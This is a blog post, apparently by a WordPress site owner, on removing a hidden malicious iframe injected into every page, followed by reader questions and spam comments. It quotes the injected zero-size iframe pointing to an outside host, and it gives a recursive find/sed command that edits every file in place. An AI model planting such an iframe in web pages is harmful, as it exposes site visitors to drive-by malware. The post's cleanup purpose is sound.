It seems that a new WordPress malware hijack is making the rounds and we got hit. Google just issued me a “this site contains malware” warning for my sites, after some quick investigation it looks like the hijack has attached a malicious <iframe> block to the end of every HTML and PHP page in the site, so now I need to clean it out.
Luckily this is just like last time, and was easy to get rid of. I hope this tip helps someone else out as well.
This time, the iframe snippet that was getting added was:
<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Luckily, I had my old script laying around that systematically searches through all my files and removed the offending piece of crap from the files, you can use this script command as well to do the same:
find . -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross.com\/laso\/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;
Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability 
Hey, I’m having similar problems… my RSS feed link got infected too
Any idea how to remove that too?
Also where and how do I include this text? [I'm not a tech guy]
find . -name ‘*.*’ -exec sed -i ‘s///g’ {} \;
Thank you
Codrut,
I’m not sure which part of WordPress generates the RSS feed content, so I’m not sure where to look to clear that out — but you execute that line of code I provided from a Unix/Linux command line from the root directory of where your wordpress install lives — it will scan *every* file looking for the pattern of the injected infected content and replace it with nothing — effectively removing it.
It should clean it out from wherever the RSS infection is taking place as well.
We seem to have been hit earlier – we discovered it in older posts only. And that accidentally by looking for an old post.
But this is helpful – seeing another variation on the problem.
JS
Jonathan I hope you guys got everything cleaned out OK? If you run the command given anyway, it’s more or less a no-op if there are no matching hacked scripts so it’s relatively harmless if you just wanted to run it to be safe. But if you already got things cleaned up then you should be OK.
Find and sed are unix linux tools. Have you tested this in a terminal wind on Mac OSX? What about windows?
Find and sed are unix / linux tools. Have you tested this in a terminal wind on Mac OSX? What about MS Windows?
Unknown message
I’m sure this would help guests extremely. Will save your website for more updates! Thank’s
Hey Admin, Sharing unique information is quite complicated and really you’ve done the complicated job. Thanks for sharing such an amazing information.